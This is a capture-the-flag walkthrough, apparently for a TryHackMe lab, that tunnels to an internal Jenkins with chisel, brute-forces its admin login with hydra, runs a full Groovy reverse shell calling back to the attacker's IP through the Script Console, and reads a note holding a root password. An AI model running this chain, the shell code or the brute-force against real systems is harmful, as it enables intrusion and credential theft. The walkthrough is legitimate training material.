└─$ ./chisel_1.10.1_linux_amd64

 Usage: chisel [command] [--help]

 Version: 1.10.1 (go1.23.1)

 Commands:

   server - runs chisel in server mode

   client - runs chisel in client mode

 Read more:

    https://github.com/jpillora/chisel

┌──(luis㉿kali)-[~/Descargas]

└─$ scp chisel_1.10.1_linux_amd64 aubreanna@10.10.216.78:/tmp

aubreanna@10.10.216.78's password:

chisel_1.10.1_linux_amd64

Start the chisel server on the attacking machine first (see the next block), then run the client on the target. The client connects outbound to 10.2.2.76:8002 and requests a reverse forward, R:443:127.0.0.1:8080, meaning port 443 on the attacking machine will be relayed to 127.0.0.1:8080 on the target:

aubreanna@internal:~$ mv /tmp/chisel_1.10.1_linux_amd64 .

aubreanna@internal:~$ ./chisel_1.10.1_linux_amd64 client 10.2.2.76:8002 R:443:127.0.0.1:8080

2025/08/07 11:58:10 client: Connecting to ws://10.2.2.76:8002

2025/08/07 11:58:15 client: Connected (Latency 641.578452ms)


On the attacking machine the server must run with --reverse to accept that request. Once the session is up it logs the new listener, and Jenkins is reachable at http://127.0.0.1:443/ (plain HTTP; 443 is simply the port chosen here). Since we already have SSH credentials, the same result with less footprint on the target is an SSH local forward, ssh -L 8080:127.0.0.1:8080 aubreanna@10.10.216.78, which needs no upload at all.

┌──(luis㉿kali)-[~/Descargas]

└─$ ./chisel_1.10.1_linux_amd64 server --reverse -p 8002

2025/08/07 13:55:21 server: Reverse tunnelling enabled

2025/08/07 13:55:21 server: Fingerprint VkzYzcJHq8soaNZxqTVeuo09pkVHiFx2ezJhkhHjaBI=

2025/08/07 13:55:21 server: Listening on http://0.0.0.0:8002

2025/08/07 13:58:12 server: session#1: tun: proxy#R:443=>8080: Listening

Jenkins presents a login form. Capturing one login attempt with Burp Suite gives the exact POST target (/j_acegi_security_check), the body parameters (j_username, j_password, from, Submit) and the text shown on a bad login, "Invalid username or password", which is everything hydra's http-form-post module needs. Hydra warns that port 443 is being used without -S; that is correct here, because the chisel listener carries plain HTTP. Trying the user admin against rockyou.txt:


┌──(luis㉿kali)-[~/Descargas]

└─$ hydra 127.0.0.1 -s 443 -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txt

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-07 14:10:26

[WARNING] you specified port 443 for attacking a http service, however did not specify the -S ssl switch nor used https-..., therefore using plain HTTP

[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task

[DATA] attacking http-post-form://127.0.0.1:443/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password

Gotcha! hydra finds the credentials within a minute:

[443][http-post-form] host: 127.0.0.1  login: admin  password: spongebob

[STATUS] attack finished for 127.0.0.1 (valid pair found)

1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-08-07 14:11:10
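Added example, not from the original post and not hydra's code: what the http-form-post module is doing against the Jenkins login, written out in Python so the success oracle is explicit. The request body mirrors the form captured in Burp; the classifier follows Jenkins' form-login behaviour as I understand it (a failed login is redirected to /loginError, a successful one to the 'from' URL, and a client that follows the redirect then sees the "Invalid username or password" text), so confirm it against one known-bad login before trusting it. The entries in SAMPLE_RESPONSES are constructed.

```python
from urllib.parse import urlencode

LOGIN_PATH = "/j_acegi_security_check"           # Jenkins form-login endpoint seen in Burp
FAILURE_MARKER = "Invalid username or password"  # the text hydra was told to match


def build_login_request(username: str, password: str, came_from: str = "/") -> tuple:
    """Path and form body of one login attempt, as the browser submits it."""
    body = urlencode({"j_username": username, "j_password": password,
                      "from": came_from, "Submit": "Sign in"})
    return LOGIN_PATH, body.encode()


def login_accepted(status: int, headers: dict, body: str) -> bool:
    """Classify one response to the POST.

    Jenkins answers with a redirect either way: to the 'from' URL when the
    password is right, to /loginError when it is wrong. A client that follows
    redirects instead ends on a 200 whose body carries FAILURE_MARKER. Checking
    the Location header first makes both kinds of client agree."""
    location = headers.get("Location", "")
    if status in (301, 302, 303):
        return "loginError" not in location
    return status == 200 and FAILURE_MARKER not in body


# Constructed sample responses (not captured from the target).
SAMPLE_RESPONSES = {
    "wrong-no-follow": (302, {"Location": "http://127.0.0.1:443/loginError"}, ""),
    "wrong-followed": (200, {}, "<html>...Invalid username or password...</html>"),
    "right": (302, {"Location": "http://127.0.0.1:443/"}, ""),
}


def classify_samples() -> dict:
    """Run the classifier over the constructed responses."""
    return {name: login_accepted(*resp) for name, resp in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    print(build_login_request("admin", "spongebob"))
    print(classify_samples())
```

The practical lesson is the one hydra's failure-string option encodes: a form login is only a usable oracle once you know what a wrong answer looks like, and that answer can differ between a raw 302 and the page you land on after following it.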

Jenkins administrators get Manage Jenkins > Script Console, which runs arbitrary Groovy on the Jenkins process (here, inside the container). Paste the following into the console to spawn bash and wire it to a socket back to the attacking machine on port 4444; it is the usual Groovy reverse shell, reformatted for readability:

String host = "10.2.2.76";
int port = 4444;
String cmd = "bash";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();

To sum up, the steps on the attacking side are:

  1. nc -lvnp 4444 (listener for the reverse shell)
  2. script /dev/null -c bash (spawns bash under a pseudo-terminal; this is a shell upgrade, not persistence)
  3. ^Z (suspend netcat)
  4. zsh: suspended nc -lvnp 4444
  5. stty raw -echo; fg (put the local terminal into raw mode so Ctrl-C, tab completion and arrow keys reach the remote shell, then resume netcat)
  6. export SHELL=bash
  7. export TERM=xterm (so remote programs know the terminal type)
  8. find / -name *.txt (look for notes; quote the pattern as "*.txt" so the remote shell expands it rather than the local one, and add 2>/dev/null to drop permission errors)

┌──(luis㉿kali)-[~/Descargas]

└─$ nc -lvnp 4444

listening on [any] 4444 ...

connect to [10.2.2.76] from (UNKNOWN) [10.10.216.78] 48558

script /dev/null -c bash

Script started, file is /dev/null

jenkins@jenkins:/$ ^Z

zsh: suspended nc -lvnp 4444

                                                                                                                             

┌──(luis㉿kali)-[~/Descargas]

└─$ stty raw -echo;fg

[2] - continued nc -lvnp 4444

                              reset xterm

jenkins@jenkins:/$ export SHELL=bash

jenkins@jenkins:/$ export TERM=xterm

jenkins@jenkins:/$ find / -name *.txt

/opt/note.txt

jenkins@jenkins:/$ cat /opt/note.txt

Aubreanna,


Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you

need access to the root user account.


root:tr0ub13guM!@#123

The note gives the root password for the host itself (same scheme as aubreanna's), so we can log in over SSH directly as root; the Jenkins container was never escaped, it only held the note. That the login works also tells us PermitRootLogin is enabled on the host, which is a finding in its own right.

┌──(luis㉿kali)-[~]

└─$ ssh root@10.10.216.78

root@10.10.216.78's password:

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation: https://help.ubuntu.com

 * Management:    https://landscape.canonical.com

 * Support:       https://ubuntu.com/advantage

 System information as of Thu Aug 7 12:40:19 UTC 2025

 System load: 0.0              Processes:             121

 Usage of /:  63.8% of 8.79GB  Users logged in:       1

 Memory usage: 43%              IP address for eth0:   10.10.216.78

 Swap usage:  0%               IP address for docker0: 172.17.0.1

 => There is 1 zombie process.

 * Canonical Livepatch is available for installation.

  - Reduce system reboots and improve kernel security. Activate at:

    https://ubuntu.com/livepatch

0 packages can be updated.

0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Aug 3 19:59:17 2020 from 10.6.2.56

root@internal:~# ls

root.txt snap

root@internal:~# cat root.txt

Gotcha! the root flag:

THM{d0ck3r_d3str0y3r}

Thank you very much for reading this article.

I hope you liked it and learned something new.

This article was written for ethical purposes only.

Good Hack
